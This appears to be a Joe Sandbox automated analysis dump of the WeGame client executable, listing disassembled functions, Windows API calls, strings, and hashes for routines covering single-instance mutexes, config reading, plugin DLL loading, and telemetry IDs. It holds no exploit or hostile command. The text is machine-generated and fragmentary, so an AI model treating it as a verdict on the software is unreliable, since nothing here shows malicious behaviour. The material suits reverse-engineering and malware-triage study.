71947 6bd4712c 71943->71947 71948 6bd47169 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_log_instance@base@@YAPAVILogger@1 71943->71948 71944->71942 71946 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71945->71946 71956 6bd470be 71946->71956 71950 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71947->71950 71955 6bd47196 71948->71955 71949 6bd47204 71951 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71949->71951 71952 6bd47148 71950->71952 71953 6bd47210 71951->71953 71954 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71952->71954 71957 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71953->71957 71954->71956 71955->71949 71959 6bd1e945 17 API calls 71955->71959 71958 6bd4722c 71957->71958 71960 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71958->71960 71959->71955 71960->71956
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0046CA45
                                                                • GetCommandLineW.KERNEL32(000001A8), ref: 0046CA5C
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0046CAA7
                                                                  • Part of subcall function 0045D5EA: __EH_prolog3_GS.LIBCMT ref: 0045D5F4
                                                                  • Part of subcall function 0045D5EA: memset.VCRUNTIME140(?,00000000,00000208,00000254), ref: 0045D678
                                                                  • Part of subcall function 0045D5EA: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0045D68D
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6A0
                                                                  • Part of subcall function 0045D5EA: wcsrchr.VCRUNTIME140(?,0000005C), ref: 0045D6AE
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6C5
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6DC
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • MessageBoxA.USER32(00000000,debug,debug,00000000), ref: 0046CAD0
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stamp_record), ref: 0046CAE3
                                                                • ?stamp_init@@YAXXZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046CAEE
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(main_start), ref: 0046CAF8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046CAFE
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046CB8C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(wegame.exe,0000000A), ref: 0046CBD8
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z.COMMON(?,?,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC39
                                                                • ?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD@Z.COMMON(?,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC58
                                                                • ?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N@Z.COMMON(00000001,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC64
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC6A
                                                                • ?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N@Z.COMMON(00000001,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC72
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,_TGP_EXISTS_MUTEX_NAME_), ref: 0046CCAC
                                                                • OutputDebugStringA.KERNEL32(?), ref: 0046CCCC
                                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 0046CCF4
                                                                • GetLastError.KERNEL32 ref: 0046CD15
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 0046CD2F
                                                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 0046CD4C
                                                                • SetEvent.KERNEL32(00000000), ref: 0046CD59
                                                                • CloseHandle.KERNEL32(00000000), ref: 0046CD66
                                                                • CloseHandle.KERNEL32(?), ref: 0046CD77
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046CD7E
                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 0046CDD8
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0046CDDF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@SimpleString::operator=U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?get_coexist_name@util_multi_instance@ierd_tgp@@?get_log_instance@base@@CloseEventHandleLogger@1@Process_invalid_parameter_noinfo_noreturn$?extract_op_from_cmd@?get_client_id@util_client_info@ierd_tgp@@?get_process_count@util_multi_instance@ierd_tgp@@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@?stamp_init@@?stamp_point@@?u16to8@common@ierd_tgp@@CommandCreateCurrentD@2@@4@@DebugErrorFileH_prolog3_H_prolog3_catch_Instance@LastLineMessageModuleMultiMutexNameOpenOutputQos@123@Qos@qos@adapt_for_imports@ierd_tgp@@StringSys_wrapper@common@ierd_tgp@@TerminateU?$char_traits@_V45@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@memmovememsetstrcmpwcsrchr
                                                                • String ID: "$--debug$-launcher=$-multi_launcher=$31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$[CleanCache] need clean page cache.$[Launcher]Command line game_id not find.$[Launcher]Command line version not find.$[Launcher]Launcher info: %s$[Launcher]Launcher parser fail: %s$[Launcher]No launcher info.$[Launcher]Parser launcher command json fail.$[Sys_wrapper]initialize COM library. Error code = %x$[main] wegame already exist.$[main]WeGame is in tool mode.$[main]get and set cmd info from cmd_start_info successfully$[wegame_launch][step1]Main start.$[wegame_launch][step2]App inited.$_TGP_EXISTS_MUTEX_NAME_$app inited$begin...$debug$delete_qb_cookies.txt$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$game_id$ierd_tgp_daemon.exe$launcher_ver$main_start$multi_launcher$normal end.$offline$offline=$stamp_record$start_from_host$uin=$wegame.exe$wegamex.exe
                                                                • API String ID: 2984307730-4208083574
                                                                • Opcode ID: 52894d3455789ef75202132d115b2645bdd3ed81e565e35c723dbefde086fa4b
                                                                • Instruction ID: e0f0a2ea875c3265d971df5443fe06ced1f2baabbfa0af9c8d14cb022d3b9553
                                                                • Opcode Fuzzy Hash: 52894d3455789ef75202132d115b2645bdd3ed81e565e35c723dbefde086fa4b
                                                                • Instruction Fuzzy Hash: 3DA2E870E00248EEDF15EBA5CC55BEEB7B4AF15308F60409EE04577282EB785E45CB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 726 (entry block 462960-462b42; graph image not preserved)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046296A
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 0046297F
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 00462984
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 00462990
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(cfg_data.ini), ref: 004629A7
                                                                • GetPrivateProfileStringW.KERNEL32(qblink_path,platform_dir,QBBlink,?,00000104,?), ref: 004629E3
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 004629F3
                                                                • GetPrivateProfileStringW.KERNEL32(qblink_path,plugin_dir,QBBlink,?,00000104,?), ref: 00462A27
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462AA4
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00462ABB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462B03
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00462B1A
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?), ref: 00462B7F
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?), ref: 00462C4E
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,?,?,?,?,?,cfg_data.ini), ref: 00462CE2
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 00462D01
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00462D1B
                                                                  • Part of subcall function 0046176A: __EH_prolog3_GS.LIBCMT ref: 00461774
                                                                  • Part of subcall function 0046176A: ?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z.COMMON(?,qblink_update,browser.exe,00000104,00462B52,?), ref: 004617B2
                                                                  • Part of subcall function 0046176A: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,cfg_data.ini), ref: 004617C7
                                                                  • Part of subcall function 0046176A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00461850
                                                                  • Part of subcall function 0046176A: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?), ref: 00461871
                                                                  • Part of subcall function 0046176A: ?remove_filename@path@filesystem@ierd_tgp@@QAEAAV123@XZ.COMMON(00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,0000060D,0048BBC7), ref: 00461882
                                                                • PathFileExistsA.SHLWAPI(c:\wgdebug.txt,QBBlink\qbclient.dll,00000014), ref: 00462D78
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(?), ref: 00462D90
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,?,?,?,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 00462DC1
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00462E01
                                                                • LoadLibraryW.KERNEL32(?), ref: 00462E1E
                                                                • GetProcAddress.KERNEL32(00000000,Prefetch), ref: 00462E2E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00462E3C
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_log_instance@base@@?u8to16@common@ierd_tgp@@FileLogger@1@V012@V123@W@2@@4@@$?instance@?u16to8@common@ierd_tgp@@D@2@@4@@ExistsH_prolog3_PathPrivateProfileSimpleStringString::operator=W@2@@std@@_invalid_parameter_noinfo_noreturnmemset$?exists@filesystem@ierd_tgp@@?get_app_sub_path@?get_workingdir_path_ex@?remove_filename@path@filesystem@ierd_tgp@@AddressLibraryLoadPath@silence_update@common@ierd_tgp@@ProcUpdatedV012@@V45@@Vpath@12@@Vpath@filesystem@3@memmove
                                                                • String ID: Prefetch$QBBlink$QBBlink$QBBlink\qbclient.dll$[QBlink]read qblink_path, platform:[%s], plugin:[%s]$[main]PrefetchQblink$\qbclient.dll$c:\wgdebug.txt$cfg_data.ini$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$platform_dir$plugin_dir$qbclient.dll$qblink_path
                                                                • API String ID: 1375377618-3187658631
                                                                • Opcode ID: 27f24b3e9a96e7f8efa9b1c6fc2e99f4335258d9aef33d017a419c4e218c65f2
                                                                • Instruction ID: 6e1272fa859d3cee3c37fde7b3fadde1d2451568f92be43ec0aeb7dbfe72c68a
                                                                • Opcode Fuzzy Hash: 27f24b3e9a96e7f8efa9b1c6fc2e99f4335258d9aef33d017a419c4e218c65f2
                                                                • Instruction Fuzzy Hash: 69F144B0D012589ADB60EB55CC95BDDB7B8AF14308F5044EEE209A7182EB785F84CF6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 813 (entry block 464392-4643de; graph image not preserved)
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0046439C
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,qos.id,00000006,?,?,?,?,?,000000EC,00459F4F), ref: 004643F0
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004644A7
                                                                • ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z.COMMON(00000B57), ref: 004644AF
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000B57), ref: 004644B4
                                                                • ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z.COMMON(00000000), ref: 004644CE
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004644D3
                                                                • ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000000), ref: 004644DE
                                                                • ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,00000000), ref: 004644EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,00000000), ref: 004644FB
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046452E
                                                                • ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046453E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464543
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464550
                                                                • ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046455C
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046456C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464573
                                                                • ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046457B
                                                                • ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464580
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004645A9
                                                                • ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 004645B4
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 004645B9
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?), ref: 004645C0
                                                                • ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?), ref: 004645DA
                                                                  • Part of subcall function 00453D50: __EH_prolog3.LIBCMT ref: 00453D57
                                                                  • Part of subcall function 00453D50: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008), ref: 00453D6E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                  • Part of subcall function 00453FD5: __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 00453FD5: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                  • Part of subcall function 00453FD5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 00420E50: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00420F68
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 0046467E
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 0046468E
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 0045DB69: __EH_prolog3_GS.LIBCMT ref: 0045DB70
                                                                  • Part of subcall function 0045DB69: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050,004646AC,00000000,?,?), ref: 0045DBA0
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?), ref: 004646DD
                                                                • ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z.COMMON(00000000), ref: 004646EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004646F0
                                                                • ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z.COMMON(?,00000000), ref: 0046470D
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464745
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(StartFor,00000008,?,00000000), ref: 00464758
                                                                • ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@$D@2@@std@@$D@2@@std@@@$Application@common@ierd_tgp@@$H_prolog3_invalid_parameter_noinfo_noreturn$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_LastLogger@1@LoginedU?$less@V12@V?$basic_ptree@memmove$?extract_op_from_cmd@?get_client_id@util_client_info@ierd_tgp@@?get_exe_path_ex@?get_machine_id@?get_session_id@?parent_path@path@filesystem@ierd_tgp@@?set_account_id@?set_bind_game_id@?set_channel_id@?set_client_version_type@?set_machine_guid_async@?set_machine_id@?set_qm_report_guid@?set_qos_id@?set_session_id@?set_uid@?set_ver@H_prolog3_catch_Id@common@ierd_tgp@@Init@locale@std@@Locimp@12@_StartSys_wrapper@common@ierd_tgp@@Uin@common@ierd_tgp@@Uversion_t@common@4@@V123@Vpath@filesystem@3@Wegame
                                                                • String ID: StartFor$initial.bind_by_game.channel_id$initial.bind_by_game.game_id$qos.id
                                                                • API String ID: 1635971299-2812686160
                                                                • Opcode ID: 11b83cd9c88deff170b7a745d753ca8c254e961404a93b54664c8c1149cf9881
                                                                • Instruction ID: c91c23193e0abaf9e6793cae274ba5bbd8d2589a74ad653bb9fc44fbfc9641b4
                                                                • Opcode Fuzzy Hash: 11b83cd9c88deff170b7a745d753ca8c254e961404a93b54664c8c1149cf9881
                                                                • Instruction Fuzzy Hash: EDA18371D00258DADB14EFBAC8517DDBBB46F14308F54849FE009B7282EB794B49CB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 872 (entry block 464492-4644a3; graph image not preserved)
                                                                APIs
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004644A7
                                                                • ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z.COMMON(00000B57), ref: 004644AF
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000B57), ref: 004644B4
